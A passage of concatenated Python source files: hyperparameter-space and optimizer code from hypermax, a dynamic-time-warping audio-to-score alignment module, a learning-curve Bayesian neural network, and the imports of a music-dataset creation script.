if 'anyOf' in self.config or 'oneOf' in self.config:
data = []
if 'anyOf' in self.config:
data = self.config['anyOf']
else:
data = self.config['oneOf']
subSpaces = [Hyperparameter(param, self, name + "." + str(index)).createHyperoptSpace(lockedValues) for index, param in enumerate(data)]
for index, space in enumerate(subSpaces):
space["$index"] = index
choices = hp.choice(self.hyperoptVariableName, subSpaces)
return choices
elif 'enum' in self.config:
if self.name in lockedValues:
return lockedValues[self.name]
choices = hp.choice(self.hyperoptVariableName, self.config['enum'])
return choices
elif 'constant' in self.config:
if self.name in lockedValues:
return lockedValues[self.name]
return self.config['constant']
elif self.config['type'] == 'object':
space = {}
for key in self.config['properties'].keys():
config = self.config['properties'][key]
space[key] = Hyperparameter(config, self, name + "." + key).createHyperoptSpace(lockedValues)
return space
elif self.config['type'] == 'number':
if self.name in lockedValues:
return lockedValues[self.name]
mode = self.config.get('mode', 'uniform')
scaling = self.config.get('scaling', 'linear')
if mode == 'uniform':
min = self.config.get('min', 0)
max = self.config.get('max', 1)
rounding = self.config.get('rounding', None)
if scaling == 'linear':
if rounding is not None:
return hp.quniform(self.hyperoptVariableName, min, max, rounding)
else:
return hp.uniform(self.hyperoptVariableName, min, max)
elif scaling == 'logarithmic':
if rounding is not None:
return hp.qloguniform(self.hyperoptVariableName, math.log(min), math.log(max), rounding)
else:
return hp.loguniform(self.hyperoptVariableName, math.log(min), math.log(max))
if mode == 'randint':
max = self.config.get('max', 1)
return hp.randint(self.hyperoptVariableName, max)
if mode == 'normal':
mean = self.config.get('mean', 0)
stddev = self.config.get('stddev', 1)
rounding = self.config.get('rounding', None)
if scaling == 'linear':
if rounding is not None:
return hp.qnormal(self.hyperoptVariableName, mean, stddev, rounding)
else:
return hp.normal(self.hyperoptVariableName, mean, stddev)
elif scaling == 'logarithmic':
if rounding is not None:
return hp.qlognormal(self.hyperoptVariableName, math.log(mean), math.log(stddev), rounding)
else:
return hp.lognormal(self.hyperoptVariableName, math.log(mean), math.log(stddev))
def getFlatParameterNames(self):
name = self.root
if 'anyOf' in self.config or 'oneOf' in self.config:
keys = set()
if 'anyOf' in self.config:
data = self.config['anyOf']
else:
data = self.config['oneOf']
for index, param in enumerate(data):
subKeys = Hyperparameter(param, self, name + "." + str(index)).getFlatParameterNames()
for key in subKeys:
keys.add(key)
return keys
elif 'enum' in self.config or 'constant' in self.config:
return [name]
elif self.config['type'] == 'object':
keys = set()
for key in self.config['properties'].keys():
config = self.config['properties'][key]
subKeys = Hyperparameter(config, self, name + "." + key).getFlatParameterNames()
for key in subKeys:
keys.add(key)
return keys
elif self.config['type'] == 'number':
return [name]
def getFlatParameters(self):
name = self.root
if 'anyOf' in self.config or 'oneOf' in self.config:
parameters = []
if 'anyOf' in self.config:
data = self.config['anyOf']
else:
data = self.config['oneOf']
for index, param in enumerate(data):
subParameters = Hyperparameter(param, self, name + "." + str(index)).getFlatParameters()
parameters = parameters + subParameters
return parameters
elif 'enum' in self.config or 'constant' in self.config:
return [self]
elif self.config['type'] == 'object':
parameters = []
for key in self.config['properties'].keys():
config = self.config['properties'][key]
subParameters = Hyperparameter(config, self, name + "." + key).getFlatParameters()
parameters = parameters + subParameters
return parameters
elif self.config['type'] == 'number':
return [self]
def getLog10Cardinality(self):
if 'anyOf' in self.config or 'oneOf' in self.config:
if 'anyOf' in self.config:
data = self.config['anyOf']
else:
data = self.config['oneOf']
log10_cardinality = Hyperparameter(data[0], self, self.root + ".0").getLog10Cardinality()
for index, subParam in enumerate(data[1:]):
# We used logarithm identities to create this reduction formula
other_log10_cardinality = Hyperparameter(subParam, self, self.root + "." + str(index)).getLog10Cardinality()
# Revert to linear at high and low values, for numerical stability. Check here: https://www.desmos.com/calculator/efkbbftd18 to observe
if (log10_cardinality - other_log10_cardinality) > 3:
log10_cardinality = log10_cardinality + 1
elif (other_log10_cardinality - log10_cardinality) > 3:
log10_cardinality = other_log10_cardinality + 1
else:
log10_cardinality = other_log10_cardinality + math.log10(1 + math.pow(10, log10_cardinality - other_log10_cardinality))
return log10_cardinality + math.log10(len(data))
elif 'enum' in self.config:
return math.log10(len(self.config['enum']))
elif 'constant' in self.config:
return math.log10(1)
elif self.config['type'] == 'object':
log10_cardinality = 0
for index, subParam in enumerate(self.config['properties'].values()):
subParameter = Hyperparameter(subParam, self, self.root + "." + str(index))
log10_cardinality += subParameter.getLog10Cardinality()
return log10_cardinality
elif self.config['type'] == 'number':
if 'rounding' in self.config:
return math.log10(min(20, (self.config['max'] - self.config['min']) / self.config['rounding'] + 1))
else:
return math.log10(20) # Default of 20 for fully uniform numbers.
def convertToFlatValues(self, params):
flatParams = {}
def recurse(key, value, root):
result_key = root + "." + key
if isinstance(value, str):
flatParams[result_key[1:]] = value
elif isinstance(value, float) or isinstance(value, bool) or isinstance(value, int):
flatParams[result_key[1:]] = value
elif isinstance(value, dict):
for subkey, subvalue in value.items():
recurse(subkey, subvalue, result_key)
for key in params.keys():
value = params[key]
recurse(key, value, '')
flatValues = {}
if 'anyOf' in self.config or 'oneOf' in self.config:
if 'anyOf' in self.config:
data = self.config['anyOf']
else:
data = self.config['oneOf']
subParameterIndex = flatParams[self.resultVariableName + '.$index']
flatValues[self.name] = subParameterIndex
for index, param in enumerate(data):
subParameter = Hyperparameter(param, self, self.root + "." + str(index))
if index == subParameterIndex:
subFlatValues = subParameter.convertToFlatValues(flatParams)
for key in subFlatValues:
flatValues[key] = subFlatValues[key]
else:
for flatParam in subParameter.getFlatParameters():
flatValues[flatParam.name] = ""
return flatValues
elif 'constant' in self.config:
flatValues[self.name] = flatParams[self.resultVariableName]
return flatValues
elif 'enum' in self.config:
flatValues[self.name] = flatParams[self.resultVariableName]
return flatValues
elif self.config['type'] == 'object':
for key in self.config['properties'].keys():
config = self.config['properties'][key]
subFlatValues = Hyperparameter(config, self, self.root + "." + key).convertToFlatValues(flatParams)
for key in subFlatValues:
flatValues[key] = subFlatValues[key]
if self.name == "":
for key in params.keys():
if key.startswith("$"):
flatValues[key] = params[key]
return flatValues
elif self.config['type'] == 'number':
flatValues[self.name] = flatParams[self.resultVariableName]
return flatValues
def convertToStructuredValues(self, flatValues):
if 'anyOf' in self.config or 'oneOf' in self.config:
if 'anyOf' in self.config:
data = self.config['anyOf']
else:
data = self.config['oneOf']
subParameterIndex = flatValues[self.name]
subParam = Hyperparameter(data[subParameterIndex], self, self.root + "." + str(subParameterIndex))
structured = subParam.convertToStructuredValues(flatValues)
structured['$index'] = subParameterIndex
return structured
elif 'constant' in self.config:
return flatValues[self.name]
elif 'enum' in self.config:
return flatValues[self.name]
elif self.config['type'] == 'object':
result = {}
for key in self.config['properties'].keys():
config = self.config['properties'][key]
subStructuredValue = Hyperparameter(config, self, self.root + "." + key).convertToStructuredValues(flatValues)
result[key] = subStructuredValue
if self.name == "":
for key in flatValues.keys():
if key.startswith("$"):
result[key] = flatValues[key]
return result
elif self.config['type'] == 'number':
return flatValues[self.name]
@staticmethod
def createHyperparameterConfigForHyperoptDomain(domain):
if domain.name is None:
data = {
"type": "object",
"properties": {}
}
for key in domain.params:
data['properties'][key] = Hyperparameter.createHyperparameterConfigForHyperoptDomain(domain.params[key])
if 'name' not in data['properties'][key]:
data['properties'][key]['name'] = key
return data
elif domain.name == 'dict':
data = {
"type": "object",
"properties": {}
}
for item in domain.named_args:
data['properties'][item[0]] = Hyperparameter.createHyperparameterConfigForHyperoptDomain(item[1])
return data
elif domain.name == 'switch':
data = {
"oneOf": [
]
}
data['name'] = domain.pos_args[0].pos_args
for item in domain.pos_args[1:]:
data['oneOf'].append(Hyperparameter.createHyperparameterConfigForHyperoptDomain(item))
return data
elif domain.name == 'hyperopt_param':
data = Hyperparameter.createHyperparameterConfigForHyperoptDomain(domain.pos_args[1])
data['name'] = domain.pos_args[0]._obj
return data
elif domain.name == 'uniform':
data = {"type": "number"}
data['scaling'] = 'linear'
data['mode'] = 'uniform'
data['min'] = domain.pos_args[0]._obj
data['max'] = domain.pos_args[1]._obj
return data
elif domain.name == 'quniform':
data = {"type": "number"}
data['scaling'] = 'linear'
data['mode'] = 'uniform'
data['min'] = domain.pos_args[0]._obj
data['max'] = domain.pos_args[1]._obj
data['rounding'] = domain.pos_args[2]._obj
return data
elif domain.name == 'loguniform':
data = {"type": "number"}
data['scaling'] = 'logarithmic'
data['mode'] = 'uniform'
data['min'] = math.exp(domain.pos_args[0]._obj)
data['max'] = math.exp(domain.pos_args[1]._obj)
return data
elif domain.name == 'qloguniform':
data = {"type": "number"}
data['scaling'] = 'logarithmic'
data['mode'] = 'uniform'
data['min'] = math.exp(domain.pos_args[0]._obj)
data['max'] = math.exp(domain.pos_args[1]._obj)
data['rounding'] = domain.pos_args[2]._obj
return data
elif domain.name == 'normal':
data = {"type": "number"}
data['scaling'] = 'linear'
data['mode'] = 'normal'
data['mean'] = domain.pos_args[0]._obj
data['stddev'] = domain.pos_args[1]._obj
return data
elif domain.name == 'qnormal':
data = {"type": "number"}
data['scaling'] = 'linear'
data['mode'] = 'normal'
data['mean'] = domain.pos_args[0]._obj
data['stddev'] = domain.pos_args[1]._obj
data['rounding'] = domain.pos_args[2]._obj
return data
elif domain.name == 'lognormal':
data = {"type": "number"}
data['scaling'] = 'logarithmic'
data['mode'] = 'normal'
data['mean'] = domain.pos_args[0]._obj
data['stddev'] = domain.pos_args[1]._obj
return data
elif domain.name == 'qlognormal':
data = {"type": "number"}
data['scaling'] = 'logarithmic'
data['mode'] = 'normal'
data['mean'] = domain.pos_args[0]._obj
data['stddev'] = domain.pos_args[1]._obj
data['rounding'] = domain.pos_args[2]._obj
return data
elif domain.name == 'literal':
data = {
'type': 'string',
'constant': domain._obj
}
return data
elif domain.name == 'randint':
data = {"type": "number"}
max = domain.pos_args[0]._obj
data['max'] = max
data['mode'] = 'randint'
return data
else:
raise ValueError(f"Unsupported hyperopt domain type {domain.name}")
```
#### File: hypermax/hypermax/optimizer.py
```python
import hyperopt
import csv
import json
import traceback
import os.path
from pprint import pprint
import datetime
import time
import numpy.random
import threading
import queue
import copy
import tempfile
import random
import subprocess
import concurrent.futures
import tempfile
import functools
import math
import atexit
import jsonschema
import pkg_resources
from hypermax.execution import Execution
from hypermax.hyperparameter import Hyperparameter
from hypermax.results_analyzer import ResultsAnalyzer
from hypermax.algorithms.atpe_optimizer import ATPEOptimizer
from hypermax.algorithms.human_guided_optimizer_wrapper import HumanGuidedOptimizerWrapper
from hypermax.algorithms.tpe_optimizer import TPEOptimizer
from hypermax.algorithms.random_search_optimizer import RandomSearchOptimizer
from hypermax.algorithms.adaptive_bayesian_hyperband_optimizer import AdaptiveBayesianHyperband
from hypermax.configuration import Configuration
class Optimizer:
resultInformationKeys = [
'trial',
'status',
'loss',
'time',
'log',
'error'
]
def __init__(self, configuration):
self.config = Configuration(configuration)
self.searchConfig = configuration.get('search', {})
# jsonschema.validate(self.searchConfig, self.configurationSchema())
self.space = self.config.createHyperparameterSpace()
self.threadExecutor = concurrent.futures.ThreadPoolExecutor()
self.resultsAnalyzer = ResultsAnalyzer(configuration)
self.results = []
self.resultFutures = []
self.best = None
self.bestLoss = None
self.thread = threading.Thread(target=lambda: self.optimizationThread(), daemon=True if configuration.get("ui", {}).get("enabled", True) else False)
self.totalTrials = self.searchConfig.get("iterations")
self.trialsSinceResultsUpload = None
self.resultsExportFuture = None
self.currentTrials = []
self.allWorkers = set(range(self.config.data['function'].get('parallel', 1)))
self.occupiedWorkers = set()
self.trialNumber = 0
self.lastATPEParameters = None
self.lastLockedParameters = None
self.atpeParamDetails = None
self.tpeOptimizer = TPEOptimizer()
self.atpeOptimizer = ATPEOptimizer()
self.abhOptimizer = AdaptiveBayesianHyperband(self.atpeOptimizer, self.searchConfig.get("min_budget", 1), self.searchConfig.get("max_budget", 100), self.searchConfig.get("eta", 3))
self.humanGuidedATPEOptimizer = HumanGuidedOptimizerWrapper(self.atpeOptimizer)
self.randomSearchOptimizer = RandomSearchOptimizer()
def __del__(self):
if self.threadExecutor:
self.threadExecutor.shutdown(wait=True)
@classmethod
def configurationSchema(self):
""" This method returns the configuration schema for the optimization module. The schema
is a standard JSON-schema object."""
return {
"type": "object",
"properties": {
"method": {"type": "string", "enum": ['atpe', 'tpe', 'random']},
"iterations": {"type": "number"},
"budget": {"type": "number"}
},
"required": ['method', 'iterations']
}
def completed(self):
return len(self.results)
def sampleNext(self):
if self.searchConfig['method'] == 'tpe':
return self.tpeOptimizer.recommendNextParameters(self.config.data['hyperparameters'], self.results, self.currentTrials)
elif self.searchConfig['method'] == 'random':
return self.randomSearchOptimizer.recommendNextParameters(self.config.data['hyperparameters'], self.results, self.currentTrials)
elif self.searchConfig['method'] == 'atpe':
params = self.humanGuidedATPEOptimizer.recommendNextParameters(self.config.data['hyperparameters'], self.results, self.currentTrials)
self.lastATPEParameters = self.atpeOptimizer.lastATPEParameters
self.lastLockedParameters = self.atpeOptimizer.lastLockedParameters
self.atpeParamDetails = self.atpeOptimizer.atpeParamDetails
return params
elif self.searchConfig['method'] == 'abh':
params = self.abhOptimizer.recommendNextParameters(self.config.data['hyperparameters'], self.results, self.currentTrials)
self.lastATPEParameters = self.atpeOptimizer.lastATPEParameters
self.lastLockedParameters = self.atpeOptimizer.lastLockedParameters
self.atpeParamDetails = self.atpeOptimizer.atpeParamDetails
return params
def computeCurrentBest(self):
best = None
bestLoss = None
for result in self.results:
if (best is None and result['loss'] is not None ) or (result['loss'] is not None and result['loss'] < bestLoss):
best = result
bestLoss = result['loss']
self.best = best
self.bestLoss = bestLoss
def startOptmizationJob(self):
availableWorkers = list(sorted(self.allWorkers.difference(self.occupiedWorkers)))
sampleWorker = availableWorkers[0]
sample = None
while sample is None:
# Hedge against any exceptions in the atpe optimizer.
try:
sample = self.sampleNext()
except Exception:
traceback.print_exc()
pass
def testSample(params, trial, worker):
currentTrial = {
"start": datetime.datetime.now(),
"trial": trial,
"worker": worker,
"params": copy.deepcopy(params)
}
self.currentTrials.append(currentTrial)
start = datetime.datetime.now()
execution = Execution(self.config.data['function'], parameters=params, worker_n=worker)
modelResult = execution.run()
end = datetime.datetime.now()
result = Hyperparameter(self.config.data['hyperparameters']).convertToFlatValues(params)
for key in params.keys():
if key.startswith("$"):
result[key] = params[key]
result['trial'] = trial
self.resultsAnalyzer.makeDirs(os.path.join(self.resultsAnalyzer.directory, "logs"))
if 'loss' in modelResult:
result['loss'] = modelResult['loss']
elif 'accuracy' in modelResult:
result['loss'] = modelResult['accuracy']
if 'status' in modelResult:
result['status'] = modelResult['status']
else:
result['status'] = 'ok'
if 'log' in modelResult:
fileName = os.path.join(self.resultsAnalyzer.directory, "logs", "trial_" + str(trial) + ".txt")
with open(fileName, "wt") as file:
file.write(modelResult['log'])
result['log'] = fileName
else:
result['log'] = ''
if 'error' in modelResult:
result['error'] = modelResult['error']
else:
result['error'] = ''
if 'time' in modelResult:
result['time'] = modelResult['time']
else:
result['time'] = (end-start).total_seconds()
self.currentTrials.remove(currentTrial)
return result
def onCompletion(worker, future):
self.occupiedWorkers.remove(worker)
self.results.append(future.result())
self.computeCurrentBest()
if not self.config.data.get("ui", {}).get("enabled", True):
pprint(future.result())
if self.resultsExportFuture is None or (self.resultsExportFuture.done() and len(self.results) > 5):
self.resultsExportFuture = self.threadExecutor.submit(
lambda: self.outputResultsWithBackup(self.config.data.get("results", {}).get("graphs", True)))
else:
self.outputResultsWithBackup(False)
if 'hypermax_results' in self.config.data:
if self.trialsSinceResultsUpload is None or self.trialsSinceResultsUpload >= self.config.data['hypermax_results']['upload_frequency']:
self.saveResultsToHypermaxResultsRepository()
self.trialsSinceResultsUpload = 1
else:
self.trialsSinceResultsUpload += 1
self.occupiedWorkers.add(sampleWorker)
sampleFuture = self.threadExecutor.submit(testSample, sample, self.trialNumber, sampleWorker)
sampleFuture.add_done_callback(functools.partial(onCompletion, sampleWorker))
self.trialNumber += 1
return sampleFuture
def runOptimizationThread(self):
self.thread.start()
def outputResultsWithBackup(self, graphs, workers=1):
self.resultsAnalyzer.outputResultsFolder(self, graphs, workers=workers)
directory_head, directory_tail = os.path.split(self.resultsAnalyzer.directory)
backup_directory = os.path.join(directory_head, ".backup_" + directory_tail + "~")
self.resultsAnalyzer.outputResultsFolder(self, graphs, directory=backup_directory, workers=workers)
def optimizationThread(self):
# Make sure we output basic results if the process is killed for some reason.
atexit.register(lambda: self.outputResultsWithBackup(False))
futures = []
for worker in range(min(len(self.allWorkers), self.totalTrials - len(self.results))):
futures.append(self.startOptmizationJob())
time.sleep(1.0)
while (len(self.results) + len(self.currentTrials)) < self.totalTrials:
completedFuture = list(concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)[0])[0]
futures.remove(completedFuture)
time.sleep(0.05)
futures.append(self.startOptmizationJob())
concurrent.futures.wait(futures)
# We are completed, so we can allocate a full contingent of workers
self.outputResultsWithBackup(True, workers=4)
def exportGuidanceJSON(self, fileName):
with open(fileName, 'wt') as file:
json.dump(self.humanGuidedATPEOptimizer.guidanceOptions, file, indent=4, sort_keys=True)
def importGuidanceJSON(self, fileName):
with open(fileName, 'rt') as file:
self.humanGuidedATPEOptimizer.guidanceOptions = json.load(file)
def exportResultsCSV(self, fileName):
allKeys = set()
for result in self.results:
for key in result:
allKeys.add(key)
fieldNames = self.resultInformationKeys + sorted(allKeys.difference(set(self.resultInformationKeys))) # Make sure we keep the order of the field names consistent when writing the csv
with open(fileName, 'wt') as file:
writer = csv.DictWriter(file, fieldnames=fieldNames if len(self.results) > 0 else [], dialect='unix')
writer.writeheader()
writer.writerows(self.results)
def importResultsCSV(self, fileName):
with open(fileName) as file:
reader = csv.DictReader(file)
results = list(reader)
newResults = []
for result in results:
newResult = {}
for key,value in result.items():
if value is not None and value != "":
try:
if '.' in value or 'e' in value:
newResult[key] = float(value)
else:
newResult[key] = int(value)
except ValueError:
newResult[key] = value
elif key == 'loss':
newResult[key] = None
elif key == 'log':
newResult[key] = ''
else:
newResult[key] = None
newResults.append(newResult)
self.results = newResults
self.computeCurrentBest()
self.trialNumber = len(self.results)
def saveResultsToHypermaxResultsRepository(self):
try:
hypermaxResultsConfig = self.config.data['hypermax_results']
with tempfile.TemporaryDirectory() as directory:
process = subprocess.run(['git', 'clone', '<EMAIL>:electricbrainio/hypermax-results.git'], cwd=directory, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
hypermaxResultsDirectory = os.path.join(directory, 'hypermax-results', hypermaxResultsConfig['name'])
self.resultsAnalyzer.outputResultsFolder(self, detailed=False, directory=hypermaxResultsDirectory)
with open(os.path.join(hypermaxResultsDirectory, "metadata.json"), 'wt') as file:
json.dump(self.config.data['hypermax_results'], file, indent=4)
process = subprocess.run(['git', 'add', hypermaxResultsDirectory], cwd=os.path.join(directory, 'hypermax-results'))
process = subprocess.run(['git', 'commit', '-m', 'Hypermax automatically storing results for model ' + hypermaxResultsConfig['name'] + ' with ' + str(len(self.results)) + " trials."], cwd=os.path.join(directory, 'hypermax-results'), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process = subprocess.run(['git push'], cwd=os.path.join(directory, 'hypermax-results'), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except Exception as e:
print(e)
``` |
{
"source": "00sapo/MMSP2021-Audio2ScoreAlignment",
"score": 3
} |
#### File: MMSP2021-Audio2ScoreAlignment/alignment/fede_dtw.py
```python
from math import floor
from typing import Callable
import numpy as np
import plotly.express as px
from dtw import stepPattern as sp
# yapf: disable
# DTW
#: a symmetric pattern for DTW
symmetric = sp.StepPattern(
sp._c(
# diagonal
1, 1, 1, -1,
1, 0, 0, 3,
# vertical
2, 1, 0, -1,
2, 0, 0, 2,
# horizontal
3, 0, 1, -1,
3, 0, 0, 2,
# 1 vertical + diagonal
4, 2, 1, -1,
4, 1, 0, 2,
4, 0, 0, 2,
# 1 horizontal + diagonal
5, 1, 2, -1,
5, 0, 1, 2,
5, 0, 0, 2,
),
"NA")
#: an asymmetric pattern which favours the horizontal paths (changing column is
#: easier than changing row)
asymmetric_hor = sp.StepPattern(
sp._c(
# diagonal
1, 1, 1, -1,
1, 0, 0, 3,
# vertical
2, 1, 0, -1,
2, 0, 0, 2,
# horizontal
3, 0, 1, -1,
3, 0, 0, 1,
# 1 vertical + diagonal
4, 2, 1, -1,
4, 1, 0, 2,
4, 0, 0, 2,
# 1 horizontal + diagonal
5, 1, 2, -1,
5, 0, 1, 2,
5, 0, 0, 1,
),
"NA")
#: an asymmetric pattern which favours the vertical paths (changing row is
#: easier than changing column)
asymmetric_ver = sp.StepPattern(
sp._c(
# diagonal
1, 1, 1, -1,
1, 0, 0, 3,
# vertical
2, 1, 0, -1,
2, 0, 0, 1,
# horizontal
3, 0, 1, -1,
3, 0, 0, 2,
# 1 vertical + diagonal
4, 2, 1, -1,
4, 1, 0, 2,
4, 0, 0, 1,
# 1 horizontal + diagonal
5, 1, 2, -1,
5, 0, 1, 2,
5, 0, 0, 2,
),
"NA")
#: an asymmetric pattern which favours the vertical paths (changing row is
#: easier than changing column); this is like dtw.stepPattern.asymmetric, but
#: that one favours horizontal paths
asymmetric1 = sp.StepPattern(
sp._c(
# diagonal
1, 1, 1, -1,
1, 0, 0, 1,
# vertical
2, 0, 1, -1,
2, 0, 0, 1,
# second diagonal
3, 2, 1, -1,
3, 0, 0, 1
),
"N")
# yapf: enable
symmetric1 = sp.symmetric1
symmetric2 = sp.symmetric2
asymmetric2 = sp.asymmetric
step_patterns = (
asymmetric_hor,
asymmetric_ver,
symmetric,
symmetric1,
symmetric2,
asymmetric1,
asymmetric2,
)
def avg_dist(dist: Callable, dist_args: dict):
def new_dist(x: list, y: list):
out = 0
for i in range(len(x)):
out += dist(x[i], y[i], **dist_args)
return out / len(x)
return new_dist
def idx_range(idx, radius, length):
"""
given an idx, a radius and a maximum length, returns starting and ending
indices of a a window centered at that idx and having that radius, without
indices > length nor < 0
"""
return max(0, idx - radius), min(length, idx + radius + 1)
class FedeWindow(object):
"""
A windowing function which computes a different slanted-band at each point
based on the local difference of the main slanted diagonal; the local
radius is computed as:
`max(
min_radius,
floor(
alpha * avg_dist_fn(
x[i - beta : i + beta],
y[j - beta : j + beta]
)
)
)`
where:
* N is the length of x
* M is the length of y
* avg_dist_fn is the average of dist_fn on each corresponding sample
* j = floor(i * M / N)
By words, `beta` is half the length of a sliding window used to compute
distances between excerpts of `x` and `y` taken along the slanted diagonal.
The distance is multiplied by `alpha` to get the local radius length.
`x` and `y` are sequences with shape ([M, N], features)
"""
def __init__(self,
x,
y,
dist_fn: Callable,
alpha=5,
beta=5,
min_radius=5,
dist_args: dict = {}):
self.alpha = alpha
self.beta = beta
self.min_radius = min_radius
self.dist_fn = avg_dist(dist_fn, dist_args)
self.compute_mask(x, y)
def compute_mask(self, x, y):
# take the distance function
N = len(x)
M = len(y)
transpose = False
if M > N:
# x should always be longer than y
x, y = y, x
N, M = M, N
# if we swap x and y, we need to swap the mask too
transpose = True
# a mask to remember points
self.mask = np.zeros((len(x), len(y)), dtype=np.bool8)
# for each point in x
for i in range(N):
# compute the point in y along the diagonal
j = floor(i * M / N)
# compute the sliding windows
start_x, end_x = idx_range(i, self.beta, N)
start_y, end_y = idx_range(j, self.beta, M)
_x = x[start_x:end_x]
_y = y[start_y:end_y]
# pad the windows
if start_x == 0:
_x = [[0]] * (self.beta - i) + _x
elif end_x == N:
_x = _x + [[0]] * (i + self.beta - N)
if start_y == 0:
_y = [[0]] * (self.beta - j) + _y
elif end_y == M:
_y = _y + [[0]] * (j + self.beta - M)
# compute the local radius
lr = max(self.min_radius,
floor(self.alpha * self.dist_fn(_x, _y)))
# set the points inside the local radius to True
self.mask[slice(*idx_range(i, lr, N)),
slice(*idx_range(j, lr, M))] = True
if transpose:
self.mask = self.mask.T
def __call__(self, i, j, query_size=None, reference_size=None):
return self.mask[i, j]
def plot(self):
"""
Return a plotly Figure object representing the heatmap of the mask
"""
return px.imshow(self.mask, aspect='auto')
def _remove_conflicting_match(arr_x: np.ndarray, arr_y: np.ndarray,
graph_matrix: np.ndarray, target: int):
"""
1. look for repeated values in `arr_x` or `arr_y`, depending on `target`
2. look for the maximum value in `graph_matrix[1]`, at the indices in
`arr_x` and `arr_y` relative to the repeated values
3. among the repeated values in the target, chose the ones corresponding to
the maximum in `graps_matrix[1]`
4. return `arr_x` and `arr_y` without the removed indices
"""
if target == 0:
_target = arr_x
elif target == 1:
_target = arr_y
else:
raise RuntimeError(f"`target` should be 0 or 1, used {target} instead")
arr_mask = np.ones(_target.shape[0], dtype=np.bool8)
unique_vals, unique_count = np.unique(_target, return_counts=True)
for unique_val in unique_vals[unique_count > 1]:
conflicting_idx = np.nonzero(_target == unique_val)[0]
to_keep_idx_of_idx = np.argmax(graph_matrix[1, arr_x[conflicting_idx],
arr_y[conflicting_idx]])
arr_mask[conflicting_idx] = 0
arr_mask[conflicting_idx[to_keep_idx_of_idx]] = 1
return arr_x[arr_mask], arr_y[arr_mask]
def merge_matching_indices(args):
"""
Takes a list of mapping indices, fills the graph matrix counting the number
of times a match happens in the mappings. Then start taking matching from
the most matched and iteratively adding new matching. If two conflicting
matching have the same number of counts, takes the matching which appears
in the longest mapping; in case of parity the first one is taken
"""
# creating the matrix
num_notes = np.max([arg[:, 0].max() for arg in args]) + 1, np.max(
[arg[:, 1].max() for arg in args]) + 1
# dim 0 records the counts, dim 1 records the most long mapping containing
# the matching
graph_matrix = np.zeros((2, num_notes[0], num_notes[1]), dtype=np.int64)
# filling the matrix
for arg in args:
# the count
graph_matrix[0, arg[:, 0], arg[:, 1]] += 1
# the length
L = arg.shape[0]
graph_matrix[1, arg[:, 0], arg[:, 1]] = np.maximum(
graph_matrix[1, arg[:, 0], arg[:, 1]], L)
# merging
# two indices which records references to the original matrix
index_rows = np.arange(num_notes[0])
index_cols = np.arange(num_notes[1])
merged = []
for k in range(len(args), 0, -1):
# take matchings that appear `k` times
candidates_row, candidates_col = np.nonzero(graph_matrix[0] == k)
# remove conflicting candidates
candidates_row, candidates_col = _remove_conflicting_match(
candidates_row, candidates_col, graph_matrix, 0)
candidates_row, candidates_col = _remove_conflicting_match(
candidates_row, candidates_col, graph_matrix, 1)
# add candidates to the output
merged.append(
np.stack([index_rows[candidates_row], index_cols[candidates_col]],
axis=1))
# remove matched notes from graph_matrix
mask_rows = np.ones(graph_matrix.shape[1], dtype=np.bool8)
mask_cols = np.ones(graph_matrix.shape[2], dtype=np.bool8)
mask_rows[candidates_row] = 0
mask_cols[candidates_col] = 0
graph_matrix = graph_matrix[:, mask_rows]
graph_matrix = graph_matrix[:, :, mask_cols]
# remove matched notes from the index
index_rows = index_rows[mask_rows]
index_cols = index_cols[mask_cols]
# re-sort everything and return
merged = np.concatenate(merged, axis=0)
# print(f"Added notes from merging: {len(ref) - L}")
return merged[merged[:, 0].argsort()]
```
#### File: alignment/pybnn_module/lcnet.py
```python
from copy import deepcopy
import numpy as np
import torch
import torch.nn as nn
from pybnn.bohamiann import Bohamiann
from pybnn.util.layers import AppendLayer
def vapor_pressure(x, a, b, c, *args):
b_ = (b + 1) / 2 / 10
a_ = (a + 1) / 2
c_ = (c + 1) / 2 / 10
return torch.exp(-a_ - b_ / (x + 1e-5) - c_ * torch.log(x)) - (torch.exp(a_ + b_))
def log_func(t, a, b, c, *args):
a_ = (a + 1) / 2 * 5
b_ = (b + 1) / 2
c_ = (c + 1) / 2 * 10
return (c_ + a_ * torch.log(b_ * t + 1e-10)) / 10.
def hill_3(x, a, b, c, *args):
a_ = (a + 1) / 2
b_ = (b + 1) / 2
c_ = (c + 1) / 2 / 100
return a_ * (1. / ((c_ / x + 1e-5) ** b_ + 1.))
def bf_layer(theta, t):
y_a = vapor_pressure(t, theta[:, 0], theta[:, 1], theta[:, 2])
y_b = log_func(t, theta[:, 3], theta[:, 4], theta[:, 5])
y_c = hill_3(t, theta[:, 6], theta[:, 7], theta[:, 8])
return torch.stack([y_a, y_b, y_c], dim=1)
def get_lc_net_architecture(input_dimensionality: int) -> torch.nn.Module:
class Architecture(nn.Module):
def __init__(self, n_inputs, n_hidden=50):
super(Architecture, self).__init__()
self.fc1 = nn.Linear(n_inputs - 1, n_hidden)
self.fc2 = nn.Linear(n_hidden, n_hidden)
self.fc3 = nn.Linear(n_hidden, n_hidden)
self.theta_layer = nn.Linear(n_hidden, 9)
self.weight_layer = nn.Linear(n_hidden, 3)
self.asymptotic_layer = nn.Linear(n_hidden, 1)
self.sigma_layer = AppendLayer(noise=1e-3)
def forward(self, input):
x = input[:, :-1]
t = input[:, -1]
x = torch.tanh(self.fc1(x))
x = torch.tanh(self.fc2(x))
x = torch.tanh(self.fc3(x))
theta = torch.tanh(self.theta_layer(x))
bf = bf_layer(theta, t)
weights = torch.softmax(self.weight_layer(x), -1)
residual = torch.tanh(torch.sum(bf * weights, dim=(1,), keepdim=True))
asymptotic = torch.sigmoid(self.asymptotic_layer(x))
mean = residual + asymptotic
return self.sigma_layer(mean)
return Architecture(n_inputs=input_dimensionality)
class LCNet(Bohamiann):
def __init__(self, **kwargs) -> None:
super(LCNet, self).__init__(get_network=get_lc_net_architecture,
normalize_input=True,
normalize_output=False,
**kwargs)
@staticmethod
def normalize_input(x, m=None, s=None):
if m is None:
m = np.mean(x, axis=0)
if s is None:
s = np.std(x, axis=0)
x_norm = deepcopy(x)
x_norm[:, :-1] = (x[:, :-1] - m[:-1]) / s[:-1]
return x_norm, m, s
``` |
{
"source": "00sapo/OpenEWLD",
"score": 3
} |
#### File: 00sapo/OpenEWLD/EWLDcreation.py
```python
import time
import argparse
import csv
import json
import operator
import os
import sys
import traceback
import zipfile
import sqlite3
from collections import defaultdict
from typing import List, Dict
import discogs_client
import requests
from music21 import converter, stream, note, chord, text, musicxml, features, key, harmony
